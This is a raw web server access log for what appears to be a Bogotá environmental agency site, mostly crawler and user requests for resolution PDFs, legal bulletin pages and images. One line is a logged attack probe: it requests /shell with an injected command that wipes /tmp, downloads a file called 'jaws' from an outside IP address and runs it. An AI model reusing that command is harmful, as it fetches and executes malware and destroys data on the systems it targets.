186.102.15.74 - - [27/May/2022:06:40:36 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+cEV+SZe7/pFTeEQAKNGXKyATpZp7QBJo4cGoBXt5y5RZhZxg8xbxFm8g91eG32VNEyKL6kX8f2JobnhA3dw1+dn/ZI7AsobJp3LVN/tsqCcfrK5TI9Z+8/szk6jiAMGJIOPbGZAEQ7/rgoJ7LDzKlJp/yrR8VyoN9EzTFui7ckZSKE4DslHcrAw3HQzHtAUhNdoeolTspyTxyQQyYusZP0LdhmdBY0ZX25W7TvFxqvTUGO+TqgnWUpJnCBX3h9nkKaCMCdFJQoaWP6EZG0iL+lHJdnkuPq4NFhA83ECCyurAm7UL0+u1/hs2qSKrTNZBLvAmQk7e7zhVeZgN3MU5q2OdlWYS0aMgvbO20yLxTjY1qZX/+WaJ4ED6NQzMDjLePSbb0nRc3OR/tIGSR7C3BPw4jYwywCpg7t84ELY9uyHbiO+RPwyW7FwJi2ItAQMwJtRFcmNr8hAPV14vswR+z8ubOB0y6qrp6/zuddM97SXCm+TK4SoPLTp1uJmLXI+O8YsduGav3msSwxw/oiBuI1FbH7/iPqd/kaksUBTaDyE9TOIkuZ6syzTSf4YqykC2cC+vOtfQNNiuh4wieMGvulGGy4sCdYi634EP7GVB07wgFsAPWWiJd4oMzxCo1oQJYDsFoqPBajVW0d2aZj7Evgc+8VrZYBN0J5YMuMeb4V+CeXnGejTbJ0Si6RlSg/G9FgY+m2iHUg1N9oiEB9wwWIcNZECRGubJsCTlbHQ63i4NVwj74Gg55rpL6VBTQ9WdSepR0CfwjXnvk5spZL5PtNzS3na09SpQarTLW3Pd9MfM6gKDAz2ftGB2vDiUefM6qH9ctXdAf1rcBZy8o0QJZkG8lj77N2v6//klMFIjbRVaaWd202cgeb1cwx/E3akwU+HlktY3s7GVT87AD8gsW5LYLY20cpGUotz8ma3cX5z7tW/dQ/Sgsi3wwozx+qkwLqoBbgAtdmfeME4MyWy+nVl/goK1rCSFB7LstRYESd1HJMrd8mlMYT1/x3hQmvhM/cjVtdvVVMuQT8HYwboxlm74aAHCZHfmZqR0HaaMZSps5W+aq9YPIP1ZfvOvVlFuMvLFhYFGgRxhOLWLBxt6NJW8OyGKdQs9GFimDHeAN5CvjHIEx93L/NI14eMHlheYhWGsXbEGhMO02GTNbtpPOEHkofPoFZ9187h62yqCfCjdkuO0zeXu33UhtFHsusTuDZ/x5HFiOhcOLZbTRfCYY40CynDX1eOOydUTdmh03theaZgdr+W+hW+pgPnhDSKieEV78ag4JJxusGnHAmxyFY40D/rzbezVRYjhEx3sxjs8X7iGXRYTnLJ3y6NYmTsxDHAqiFmb8McC1sEg5jaQcw2wE1ED9K9w=&u=U2FsdGVkX18lM4CTr+bnLjXDXa/I7N/h+JxRV5gIros=&y=U2FsdGVkX19Hvt9mux5QEQHkKM5vHR5IEo1ficOuCIufiQ0yKwdu0MrJvhSuMRdt HTTP/1.1" 200 734
186.102.15.74 - - [27/May/2022:06:40:36 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+GgZj7Bp5DRg1N0AfRs7cp9g3peuOXrDtdHSU474y7GkeMA2p9JZ+sGKj0dvHQlmJF2o/BXq4GKyQket4jj+7gdDa9P0rfiJHUcoMwaLSKTtFDGVj2vywRjLkMBsUmu+9N9SbZ7WakqR1XB3QvMPv/NS5qKA83n+gehskWCQ4/Bfucuz66VKfspl8ZRjpjUlxSfTnf3Qwkx2C2dVYKyhJh58wBdDFoi7xCotvp07D8HwoTd8CxCPwSOa/1btxmmQV0WoFy7E3izUj40UPIUZGMplR7FnBpn0U=&u=U2FsdGVkX18lM4CTr+bnLjXDXa/I7N/h+JxRV5gIros=&y=U2FsdGVkX19Hvt9mux5QEQHkKM5vHR5IEo1ficOuCIufiQ0yKwdu0MrJvhSuMRdt HTTP/1.1" 200 176
186.102.15.74 - - [27/May/2022:06:40:36 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX18dS95XHI6yztsZtWYF1Rw/LbW7xa7I+kVJwpcdeypltwsExcjfrDU4 HTTP/1.1" 200 30992
216.245.221.92 - - [27/May/2022:06:41:56 -0500] "HEAD / HTTP/1.1" 200 -
186.30.78.34 - - [27/May/2022:06:42:18 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 12235
186.30.78.34 - - [27/May/2022:06:42:18 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 874878
201.245.192.253 - - [27/May/2022:06:41:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44144
207.46.13.146 - - [27/May/2022:06:42:44 -0500] "GET /bla/resoluciones/resoluciones%202012/0807.pdf HTTP/1.1" 200 571558
186.30.78.34 - - [27/May/2022:06:42:57 -0500] "GET /BLA/resoluciones/AUTOS%202014/0634.pdf HTTP/1.1" 200 614575
201.245.192.253 - - [27/May/2022:06:42:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44113
186.30.78.34 - - [27/May/2022:06:43:54 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2014%2F HTTP/1.1" 200 333168
186.30.78.34 - - [27/May/2022:06:44:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/0634.pdf HTTP/1.1" 200 795593
207.46.13.146 - - [27/May/2022:06:44:34 -0500] "GET /bla/resoluciones/resoluciones%202012/0938.pdf HTTP/1.1" 200 572000
172.22.2.4 - - [27/May/2022:06:42:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.127 - - [27/May/2022:06:45:10 -0500] "GET /bla/resoluciones/resoluciones%202012/1815.pdf HTTP/1.1" 200 393101
157.55.39.8 - - [27/May/2022:06:45:15 -0500] "GET /bla/resoluciones/resoluciones%202012/0969.pdf HTTP/1.1" 200 355580
172.22.2.4 - - [27/May/2022:06:43:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61408
186.30.78.34 - - [27/May/2022:06:46:20 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2014%2F HTTP/1.1" 200 333168
66.249.65.13 - - [27/May/2022:06:46:32 -0500] "-" 408 -
216.245.221.92 - - [27/May/2022:06:46:57 -0500] "HEAD / HTTP/1.1" 200 -
69.63.184.4 - - [27/May/2022:06:47:32 -0500] "GET /images/jornadas-llantas-usadas-23-mayo.jpg HTTP/1.1" 200 148376
173.252.107.118 - - [27/May/2022:06:47:37 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
173.252.107.5 - - [27/May/2022:06:47:42 -0500] "GET /images/cerros-bogota-2-mayo.jpg HTTP/1.1" 200 98367
173.252.107.2 - - [27/May/2022:06:47:47 -0500] "GET /images/fachada-secretaria-ambiente-abril.jpg HTTP/1.1" 200 148853
207.46.13.179 - - [27/May/2022:06:48:41 -0500] "GET /bla/resoluciones/resoluciones%202012/1554.pdf HTTP/1.1" 200 3178718
157.55.39.43 - - [27/May/2022:06:49:35 -0500] "GET /bla/resoluciones/resoluciones%202012/0042.pdf HTTP/1.1" 200 797096
172.22.2.4 - - [27/May/2022:06:48:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:06:49:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55926
216.245.221.92 - - [27/May/2022:06:51:57 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.2 - - [27/May/2022:06:54:58 -0500] "GET /images/jardines-verticales-plantas-24-mayo.jpg HTTP/1.1" 200 148288
172.22.2.4 - - [27/May/2022:06:55:25 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/G__Jurisp.%20Junio%202014_Sent%20Tutela%20Drumond.docx HTTP/1.1" 200 25380
172.22.2.4 - - [27/May/2022:06:55:32 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [27/May/2022:06:55:32 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
157.55.39.15 - - [27/May/2022:06:55:36 -0500] "GET /bla/resoluciones/resoluciones%202022/0139.pdf HTTP/1.1" 200 793893
172.22.2.4 - - [27/May/2022:06:55:43 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3831&usuario=&sector=&fecha=2011&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [27/May/2022:06:55:54 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3831&usuario=&sector=&fecha=2011&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [27/May/2022:06:55:55 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3831&usuario=&sector=&fecha=2011&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [27/May/2022:06:55:58 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3831&usuario=&sector=&fecha=2011&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [27/May/2022:06:55:59 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3831&usuario=&sector=&fecha=2011&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [27/May/2022:06:55:59 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3831&usuario=&sector=&fecha=2011&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [27/May/2022:06:55:59 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3831&usuario=&sector=&fecha=2011&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [27/May/2022:06:55:59 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3831&usuario=&sector=&fecha=2011&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [27/May/2022:06:56:00 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3831&usuario=&sector=&fecha=2011&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [27/May/2022:06:56:00 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3831&usuario=&sector=&fecha=2011&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [27/May/2022:06:56:06 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=3831&usuario=&sector=&fecha=2011&resuelve= HTTP/1.1" 200 1263
201.245.192.253 - - [27/May/2022:06:56:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/3831.pdf HTTP/1.1" 200 211779
172.22.2.4 - - [27/May/2022:06:54:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [27/May/2022:06:56:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:06:57:03 -0500] "GET /BLA/boletinlegal/Directivas/2018/Directiva%20No.%2025%20del%2027%20de%20diciembre%20de%202018.pdf HTTP/1.1" 200 1351319
172.22.2.4 - - [27/May/2022:06:55:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
157.55.39.43 - - [27/May/2022:06:59:15 -0500] "GET /Publicaciones/2022EE85061.pdf HTTP/1.1" 404 227
181.51.34.129 - - [27/May/2022:07:00:31 -0500] "GET /proyecto-de-eficiencia-energetica-y-energia-solar-para-entidades-publicas-de-bogota-recibira-apoyo-de-c40.html HTTP/1.1" 200 890
181.51.34.129 - - [27/May/2022:07:00:31 -0500] "GET /images/energia-eficiencia-26-mayo.jpg HTTP/1.1" 200 46417
114.119.144.178 - - [27/May/2022:07:01:25 -0500] "-" 408 -
216.245.221.92 - - [27/May/2022:07:01:57 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:07:00:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:07:01:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
186.102.10.25 - - [27/May/2022:07:03:00 -0500] "GET /proyecto-de-eficiencia-energetica-y-energia-solar-para-entidades-publicas-de-bogota-recibira-apoyo-de-c40.html HTTP/1.1" 200 890
114.119.135.143 - - [27/May/2022:07:03:02 -0500] "-" 408 -
195.62.32.77 - - [27/May/2022:07:03:08 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+27.254.163.205/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
207.46.13.146 - - [27/May/2022:07:04:47 -0500] "GET /bla/resoluciones/resoluciones%202012/0948.pdf HTTP/1.1" 200 871067
114.119.143.5 - - [27/May/2022:07:04:53 -0500] "-" 408 -
207.46.13.146 - - [27/May/2022:07:05:06 -0500] "GET /bla/resoluciones/resoluciones%202022/1992.pdf HTTP/1.1" 200 328492
216.245.221.92 - - [27/May/2022:07:06:56 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.179 - - [27/May/2022:07:07:22 -0500] "GET /autoliquidacion/solicitud%20de%20licencia%20ambiental/Solicitud%20de%20licencia%20ambiental.....pdf HTTP/1.1" 304 -
172.22.2.4 - - [27/May/2022:07:06:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:07:07:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
186.102.0.154 - - [27/May/2022:07:10:13 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
207.46.13.146 - - [27/May/2022:07:10:16 -0500] "GET /bla/resoluciones/resoluciones%202012/1892.pdf HTTP/1.1" 200 364555
186.102.0.154 - - [27/May/2022:07:10:13 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.0.154 - - [27/May/2022:07:10:20 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.0.154 - - [27/May/2022:07:10:20 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.0.154 - - [27/May/2022:07:10:33 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19HYXoLcC4KolhnodRYxGYPI4fgIjIv5ikx86V+HTSXk9mCV/7JqzbuolMH1QIIVNyEi6xo2dmfP7/zZH0PHRhzkl1lH8FermYAzYmGYXJi+DznF0p4DnZy6tvjJhEy3eIvyegxAzVghnXPvAyoAFYISO3NkFm38IYpneuFoDYrdDxRYLkMwF9XnMjOz629U3sy9DZ87uoAmr1exLhWX2r/q4WrH/53YFlDktSy6uPNVzjp92XZD1EzW293jAelXpJTysaDIPdxOA==&u=U2FsdGVkX1/tmWbGY02Zeg8aV2ogDSXqgQhivuC4hLBKhBU4VY4RkMDmJup3S8EP&y=U2FsdGVkX196vwgUdoTSPJPt5N1a6W+la5KzQqX6yLcr7qIliHFkIlioEm2QNDAg HTTP/1.1" 200 25
186.102.0.154 - - [27/May/2022:07:10:33 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX1/tmWbGY02Zeg8aV2ogDSXqgQhivuC4hLBKhBU4VY4RkMDmJup3S8EP&y=U2FsdGVkX196vwgUdoTSPJPt5N1a6W+la5KzQqX6yLcr7qIliHFkIlioEm2QNDAg HTTP/1.1" 200 25
186.102.0.154 - - [27/May/2022:07:10:33 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/yZ5q//e4ZlexGj9YzM+NercCcgEaVyh53Ajh2hp0dqoWOxzkCvVpnJ7EhYUVjzobHyxWU/7FC/DuFLXDaEtBr4X/EmVzcmvAX2j1Z4nTq0SIfWZhhye0aOoNOvIwqfO7KxTqk3N7SGilg0M/ymK7i7a17Ubzx9Iw=&u=U2FsdGVkX1/tmWbGY02Zeg8aV2ogDSXqgQhivuC4hLBKhBU4VY4RkMDmJup3S8EP&y=U2FsdGVkX196vwgUdoTSPJPt5N1a6W+la5KzQqX6yLcr7qIliHFkIlioEm2QNDAg HTTP/1.1" 200 25
186.102.0.154 - - [27/May/2022:07:10:34 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+pF2cozQLHjFdoJjnQmWsPoPMG/9CVxW+yAcangfwdovgXLQW0vQox4sQmjieq5qtBEX3aTKWkkt+hxO/PDlUmeY7+t3QovtsxYb3sxvOfC204wRlIDVrx5aLtJ+G2LiQDNo1wSaxf9n1bYnnTt/yXEHXTc86ZTQo=&u=U2FsdGVkX1/tmWbGY02Zeg8aV2ogDSXqgQhivuC4hLBKhBU4VY4RkMDmJup3S8EP&y=U2FsdGVkX196vwgUdoTSPJPt5N1a6W+la5KzQqX6yLcr7qIliHFkIlioEm2QNDAg HTTP/1.1" 200 25
186.102.0.154 - - [27/May/2022:07:10:34 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+uOsgA5uVwjMEdQCFl+/Su3zm1z0MGS+hp3bohuwplokwMMqwZlxPUKRVj2bK5tM91cYhErMJcfsivSZeDGJlvEqbJYfB1mq4E1/1Umm0n/09nna4U6wwwkwa8+wlehASRQxdrV9FqdwdHNVNdpYXmT7dx36wRCeY=&u=U2FsdGVkX1/tmWbGY02Zeg8aV2ogDSXqgQhivuC4hLBKhBU4VY4RkMDmJup3S8EP&y=U2FsdGVkX196vwgUdoTSPJPt5N1a6W+la5KzQqX6yLcr7qIliHFkIlioEm2QNDAg HTTP/1.1" 200 25
186.102.0.154 - - [27/May/2022:07:10:34 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/1WCWlHpa3aRQTUb6rIqFN2hqo/SZErV1yPektIMQD/GjSwujE7q1nzJ7z8OrUsH3xd6QrjIjVrR52ezxqBuc/ebldRk1e6EWXO4TADdDZsWyO5Iic4xlCLNuX3U7HM9hndUw1/TZCqETRPqATu3mCcu2medu73As7GnF9DZbERFzadjBXG3ER&u=U2FsdGVkX1/tmWbGY02Zeg8aV2ogDSXqgQhivuC4hLBKhBU4VY4RkMDmJup3S8EP&y=U2FsdGVkX196vwgUdoTSPJPt5N1a6W+la5KzQqX6yLcr7qIliHFkIlioEm2QNDAg HTTP/1.1" 200 25
186.102.0.154 - - [27/May/2022:07:10:34 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18tzaxFZ5PglQZ5CKw7nirOd+ip+Y2BlFDYOxIcaUAP+mYA9quBGAkhEPi0uoLaqd2N9iuEjes2f9oVNmiGMwpUGx+rRQzk4RbsnpH41Xb4qVd5ZsFV/l2pdGHwrQttlOZnFXtaQPLp4oUfI1cCRp4bY9SIwbCGgvD15lttutInGwxkmdHXwgxoeFNxi+DcmKlInfqM4O0YoQ==&u=U2FsdGVkX1/tmWbGY02Zeg8aV2ogDSXqgQhivuC4hLBKhBU4VY4RkMDmJup3S8EP&y=U2FsdGVkX196vwgUdoTSPJPt5N1a6W+la5KzQqX6yLcr7qIliHFkIlioEm2QNDAg HTTP/1.1" 200 25
186.102.0.154 - - [27/May/2022:07:10:35 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19D1RsWS1JiJSppZ3mOzJPgbYrYsiHMkMycb2tNynbCnBnPbhht2rftRN3Gb9j/DgU+Uh6BC+LO0UCLSs1z1/VD9Bee78Wp8OLef2wiVagQ27VGpEg14Nb55diu6q+7a1/ag7PbS3M1GPEcmrOPGodegZ+2xy9xQWUzxfKMoEpb5QNsXrtq5pCiJWeN3T1Ad4BFy9ue6EOPKv3e24TuMXpzU0TQYA/zJ/7OGsSlzXySWB45WqEZf4cEEkLUvohc5N+mM+Wk2hilY/FJPIPMAkGIfq6ZS4ap1bovOJHn0TqkrvcpY/jiAPCCtTfXCoR0Z10xbvQQqK68EyOOvIuBqmwNdIFtjKlwgY9EToRrE2MmEkl6hEAeHL/voQ9QskUXHEoRz7uPsFSM2yoNF+lqL1wj9TuRYwRLNe0FwY3z+4EiUABfkrq3eitf9Z0EXRZsenjdNTRSWjt80lAN5RfNQ3PTa6l+RaEeyFmuuQr9/iKp20185dzGq91u3p3uMy1evHhRBsRPbTaMZggLkn1pxx1mb5Q8E6nFiQ52kC5WzKqx45Oi4pYKTfDz&u=U2FsdGVkX1/tmWbGY02Zeg8aV2ogDSXqgQhivuC4hLBKhBU4VY4RkMDmJup3S8EP&y=U2FsdGVkX196vwgUdoTSPJPt5N1a6W+la5KzQqX6yLcr7qIliHFkIlioEm2QNDAg HTTP/1.1" 200 25
186.102.0.154 - - [27/May/2022:07:10:35 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+GuyQPnaKwZhgKMQ8GZLP+ZCXQbNHtyDiRJKqvR4vj0brbRfvGg0tg8YdL8TrvLqw2XU+P5aFj9ezLnavDRfbIHWAhRzXd7fi8sKd774GE91IibgxeNemgz9N+7agloSQEx10xHEHlk1jjhRKaoN7fqv78UcqT15cjgCAPDSB2mCxAOnt9+WjP&u=U2FsdGVkX1/tmWbGY02Zeg8aV2ogDSXqgQhivuC4hLBKhBU4VY4RkMDmJup3S8EP&y=U2FsdGVkX196vwgUdoTSPJPt5N1a6W+la5KzQqX6yLcr7qIliHFkIlioEm2QNDAg HTTP/1.1" 200 25
186.102.0.154 - - [27/May/2022:07:10:35 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/40VZ0usQdgi7RZ7yExap5Ha17keJkTWPJpoaSWIkVh0P+CM8zogUyN/5MXjEQLITXaze3Q9mR5Dl9aMsqZcyBX3j1WonPOUXFpWiYkX21VA5dGuGr3zn0gir7S1S/av6oStOn4UK3oB/tZtzeHI+8HKWqGJtgTnDfBdyO9emsg2WsStONjAeepjd6FgX9y6yhAmxcKtFMmfOUnq0x8ko+HzX5OceqWxe9+rua+bJ3k+zX4gPZqWH6KeCFqw3noI9kx1EPvNrGsqK8jzHxd/laKBCZrzz7zlY/7cDz6KcCV/jP9g1/vDV+CCF5tCEwxyNl4WPOeI4lWJ42vhPmOduZnBuO/80xC2LUpvuzc8/2mqlIr2ItwsLvLP3eRmxs9DTpz4e2gYCP4orkjGfSK0KLP7q4M2/+UOdgZr4373YsdcSRFseqHgOgiXDDx1GXU2g7XvYMVXT7kU7gg1IFJDM8Ox7oapm+aQKLnpuJc91vPVRLcS1pb4+2GXBfHv80tKOv0nOVlS45OQ==&u=U2FsdGVkX1/tmWbGY02Zeg8aV2ogDSXqgQhivuC4hLBKhBU4VY4RkMDmJup3S8EP&y=U2FsdGVkX196vwgUdoTSPJPt5N1a6W+la5KzQqX6yLcr7qIliHFkIlioEm2QNDAg HTTP/1.1" 200 25
216.245.221.92 - - [27/May/2022:07:11:57 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.43 - - [27/May/2022:07:12:38 -0500] "GET /bla/resoluciones/resoluciones%202012/0848.pdf HTTP/1.1" 200 238220
186.30.78.34 - - [27/May/2022:07:12:57 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2011%2F HTTP/1.1" 200 629573
186.30.78.34 - - [27/May/2022:07:13:17 -0500] "GET /BLA/resoluciones/AUTOS%202011/2814.pdf HTTP/1.1" 200 311435
173.252.107.6 - - [27/May/2022:07:13:19 -0500] "GET /images/jardines-verticales-plantas-24-mayo.jpg HTTP/1.1" 200 148288
157.55.39.43 - - [27/May/2022:07:13:37 -0500] "GET /bla/resoluciones/resoluciones%202012/1098.pdf HTTP/1.1" 200 535475
172.22.2.4 - - [27/May/2022:07:12:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/May/2022:07:12:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
51.75.241.40 - - [27/May/2022:07:14:54 -0500] "-" 408 -
31.13.127.119 - - [27/May/2022:07:14:55 -0500] "GET /images/FaunaOAB.jpg HTTP/1.1" 200 467631
216.245.221.92 - - [27/May/2022:07:16:57 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.21 - - [27/May/2022:07:17:18 -0500] "GET /medida-preventiva-por-afectacion-al-humedal-de-techo.html HTTP/1.1" 206 779
172.22.2.4 - - [27/May/2022:07:17:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.107.22 - - [27/May/2022:07:19:48 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
173.252.107.7 - - [27/May/2022:07:19:48 -0500] "GET /images/negocios-verdes-mayo-2022.jpg HTTP/1.1" 200 48000
69.63.184.5 - - [27/May/2022:07:19:50 -0500] "GET /images/feria-servicios-12-mayo-principal.jpg HTTP/1.1" 200 44744
69.63.189.4 - - [27/May/2022:07:19:53 -0500] "GET /images/cerros-bogota-2-mayo.jpg HTTP/1.1" 200 98367
157.55.39.127 - - [27/May/2022:07:19:53 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%203%20del%2027%20de%20Mayo%20de%202011.pdf HTTP/1.1" 200 910420
69.63.189.116 - - [27/May/2022:07:19:55 -0500] "GET /images/fachada-secretaria-ambiente-abril.jpg HTTP/1.1" 200 148853
69.63.184.1 - - [27/May/2022:07:19:59 -0500] "GET /images/JBB1.jpeg HTTP/1.1" 200 90628
